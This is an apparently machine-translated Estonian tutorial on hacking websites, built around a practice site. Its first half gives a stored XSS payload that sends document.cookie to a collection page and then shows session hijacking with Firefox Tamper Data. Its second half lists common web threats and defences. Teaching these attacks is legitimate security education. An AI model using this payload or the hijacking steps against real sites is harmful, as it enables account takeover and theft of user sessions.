Kuidas veebisaiti häkkida? Levinud saidi häkkimise tehnikad

Veebisaitide häkkimise tehnikad

Rohkematel inimestel on juurdepääs Internetile kui kunagi varem. See on ajendanud paljusid organisatsioone arendama veebipõhiseid rakendusi, mida kasutajad saavad võrgus kasutada organisatsiooniga suhtlemiseks. Veebirakenduste halvasti kirjutatud koodi saab ära kasutada tundlikele andmetele ja veebiserveritele volitamata juurdepääsu saamiseks.

Selles õpetuses saate teada, kuidas veebisaite häkkida, ja me tutvustame teile veebirakenduste häkkimise tehnikad ja vastumeetmed saate selliste rünnakute eest kaitsta.

Kuidas veebisaiti häkkida

Selle veebisaidi häkkimise praktilise stsenaariumi korral kaaperdame aadressil asuva veebirakenduse kasutajaseansi www.techpanda.org. Kasutame saitidevahelist skriptimist küpsiseansi ID lugemiseks ja seejärel seadusliku kasutajaseansi kehastamiseks.

Eeldatakse, et ründajal on juurdepääs veebirakendusele ja ta soovib kaaperdada teiste sama rakendust kasutavate kasutajate seansse. Selle rünnaku eesmärk võib olla saada veebirakendusele administraatorijuurdepääs, eeldades, et ründaja juurdepääsukonto on piiratud.

Step 1) Ava URL http://www.techpanda.org/.

Praktika eesmärgil on tungivalt soovitatav juurdepääsu saamiseks kasutada SQL-i süsti. Vaadake seda artikkel lisateabe saamiseks selle kohta, kuidas seda teha.

Step 2) Sisestage sisselogimisandmed.

Sisselogimise e-posti aadress on admin@google.com, parool on Password2010.

Step 3) Kontrollige armatuurlauda.

Kui olete edukalt sisse loginud, saate järgmise armatuurlaua

Häkkige veebisait

Step 4) Sisestage uus sisu.

Klõpsake nuppu Lisa uus kontakt ja sisestage eesnimeks järgmine

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

Step 5) lisama Javascript.

Ülaltoodud kood kasutab JavaScript. See lisab onclick sündmusega hüperlingi. Kui pahaaimamatu kasutaja lingil klõpsab, hangib sündmus alla PHP küpsise seansi ID ja saadab selle aadressile snatch_sess_id.php leht koos seansi ID-ga URL-is

Häkkige veebisait

Step 6) Lisa üksikasjad.

Sisestage ülejäänud üksikasjad, nagu allpool näidatud, ja klõpsake nuppu Salvesta muudatused

Häkkige veebisait

Step 7) Kontrollige armatuurlauda.

Teie armatuurlaud näeb nüüd välja järgmine ekraan

Häkkige veebisait

Step 8) Kontrollige seansi ID-d.

  • Kuna saidiülene skripti kood on andmebaasis salvestatud, laaditakse see iga kord, kui kasutajad, kellel on juurdepääsuõigused, sisse logivad
  • Oletame, et administraator logib sisse ja klõpsab hüperlingil, mis ütleb Dark
  • Ta avab akna URL-is kuvatava seansi ID-ga
  • Häkkige veebisait

    märkused: skript võib saata väärtuse mõnda kaugserverisse, kus on salvestatud PHPSESSID, seejärel suunatakse kasutaja tagasi veebisaidile, nagu poleks midagi juhtunud.

    märkused: saadav väärtus võib erineda sellel veebilehel olevast häkkimise õpetus, kuid kontseptsioon on sama

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    Allolev vooskeem näitab samme, mida peate selle harjutuse sooritamiseks tegema.

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    • Sa vajad Firefox veebibrauser selle jaotise ja Tamper Data lisandmooduli jaoks
    • avatud Firefox ja installige lisand, nagu on näidatud allolevatel joonistel

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    • Otsige võltsimisandmeid ja klõpsake nuppu Install, nagu ülal näidatud

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    • Klõpsake nuppu Nõustu ja installi…

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    • Kui installimine on lõppenud, klõpsake nuppu Taaskäivita kohe
    • Luba menüüriba sisse Firefox kui seda ei näidata

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    • Klõpsake tööriistamenüül ja seejärel valige Tamper Data, nagu allpool näidatud

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    • Saate järgmise akna. Märkus: kui Windows pole tühi, vajutage kustutamisnuppu

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    • Klõpsake menüüd Start Tamper
    • Lülitage tagasi valikule Firefox veebibrauser, tüüp http://www.techpanda.org/dashboard.php seejärel vajutage lehe laadimiseks sisestusklahvi
    • Saad Tamper Data lehelt järgmise hüpikakna

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    • Hüpikaknas on kolm (3) valikut. Valik Tamper võimaldab muuta HTTP päise teavet enne selle serverisse esitamist.
    • Klõpsake seda
    • Näete järgmise akna

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    • Kopeeri PHP seansi ID kopeerisite rünnaku URL-ilt ja kleepisite selle võrdusmärgi järele. Teie väärtus peaks nüüd välja nägema selline
    PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
    • Klõpsake nuppu OK
    • Näete uuesti Tamperi andmete hüpikakna

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    • Tühjendage märkeruut, mis küsib Kas jätkata rikkumist?
    • Kui olete valmis, klõpsake nuppu Esita
    • Peaksite nägema armatuurlauda, ​​nagu allpool näidatud

    Seansi kellegi teisena esinemine kasutades Firefox ja Tamper Data lisandmoodul

    märkused: me ei loginud sisse, esinesime sisselogimisseansina, kasutades PHPSESSID väärtust, mille hankisime saidiülese skriptimise abil

    Mis on veebirakendus? Mis on veebiohud?

    Veebirakendus (teise nimega veebisait) on klient-serveri mudelil põhinev rakendus. The server pakub juurdepääsu andmebaasile ja äriloogikat. Seda majutatakse veebiserveris. Kliendirakendus töötab kliendi veebibrauseris. Veebirakendused on tavaliselt kirjutatud sellistes keeltes nagu Java, C# ja VB.Net, PHP, ColdFusion Markup Language jne. veebirakendustes kasutatavate andmebaasimootorite hulka kuuluvad MySQL, MS SQL Server, PostgreSQL, SQLiteJne

    Parimad veebisaitide häkkimise tehnikad

    Enamik veebirakendusi majutatakse avalikes serverites, millele on juurdepääs Interneti kaudu. See muudab need hõlpsa juurdepääsu tõttu rünnakute suhtes haavatavaks. Järgmised on levinud veebirakenduste ohud.

    • SQL Injection – selle ohu eesmärk võib olla sisselogimisalgoritmidest mööda hiilimine, andmete saboteerimine jne.
    • Teenistuskäikude keeldumine– selle ohu eesmärk võib olla keelata seaduslikele kasutajatele juurdepääs ressursile
    • Saididevaheline skriptimine XSS- selle ohu eesmärk võib olla koodi sisestamine, mida saab käivitada kliendipoolses brauseris.
    • Küpsise/seansi mürgistus– selle ohu eesmärk on muuta küpsiseid/seansiandmeid ründaja poolt volitamata juurdepääsu saamiseks.
    • Vormi rikkumine - selle ohu eesmärk on muuta vormiandmeid, näiteks hindu e-kaubanduse rakendustes, et ründaja saaks kaupu alandatud hindadega.
    • Koodi sisestamine - selle ohu eesmärk on sisestada sellist koodi nagu PHP, Pythonjne, mida saab serveris käivitada. Kood võib installida tagauksi, paljastada tundlikku teavet jne.
    • Rikkumine– selle ohu eesmärk on muuta veebisaidil kuvatavat lehte ja suunata kõik lehepäringud ümber ühele lehele, mis sisaldab ründaja sõnumit.

    Kuidas kaitsta oma veebisaiti häkkimise eest?

    Organisatsioon võib oma veebiserveri rünnakute eest kaitsmiseks kasutusele võtta järgmise poliitika.

    • SQL Injection – kasutaja parameetrite desinfitseerimine ja valideerimine enne nende andmebaasi töötlemiseks esitamist võib aidata vähendada võimalust saada rünnata SQL Injection. Andmebaasimootorid, nagu MS SQL Server, MySQLjm tugiparameetrid ja koostatud väljavõtted. Need on palju turvalisemad kui traditsioonilised SQL-laused
    • Teenusest keeldumise rünnakud – tulemüüre saab kasutada liikluse eemaldamiseks kahtlastelt IP-aadressidelt, kui rünnak on lihtne DoS. Võrkude ja sissetungimise tuvastamise süsteemi õige konfigureerimine võib samuti aidata vähendada a DoS rünnak olnud edukas.
    • Saidiülene skriptimine – Päiste, URL-i kaudu edastatavate parameetrite, vormiparameetrite ja peidetud väärtuste valideerimine ja desinfitseerimine võib aidata vähendada XSS-i rünnakuid.
    • Küpsise/seansi mürgistus – seda saab ära hoida küpsiste sisu krüpteerimisega, küpsiste teatud aja möödudes aja mahavõtmisega, küpsiste seostamisega kliendi IP-aadressiga, mida nende loomiseks kasutati.
    • Vormi karastamine - seda saab vältida kasutaja sisendi enne töötlemist valideerimise ja kontrollimisega.
    • Koodi sisestamine – seda saab vältida, käsitledes kõiki parameetreid andmetena, mitte käivitatava koodina. Selle rakendamiseks saab kasutada desinfitseerimist ja valideerimist.
    • Rikkumine – hea veebirakenduse arendamise turvapoliitika peaks tagama, et see tihendab sageli kasutatavad haavatavused veebiserverile juurdepääsuks. See võib olla operatsioonisüsteemi õige konfiguratsioon, veebiserveri tarkvara ja parimad turvatavad veebirakenduste arendamisel.
    Kontrollige seda: 9 parimat URL-i skannerit lingi kontrollimiseks on pahavara eest kaitstud

    kokkuvõte

    • Veebirakendus põhineb server-kliendi mudelil. Kliendipool kasutab serveri ressurssidele juurdepääsuks veebibrauserit.
    • Veebirakendused on tavaliselt kättesaadavad Interneti kaudu. See muudab nad rünnakute suhtes haavatavaks.
    • Veebirakenduste ohud hõlmavad SQL-i sisestamist, koodi sisestamist, XSS-i, rikkumist, küpsiste mürgitamist jne.
    • Hea turvapoliitika veebirakenduste arendamisel võib aidata neid turvalisemaks muuta.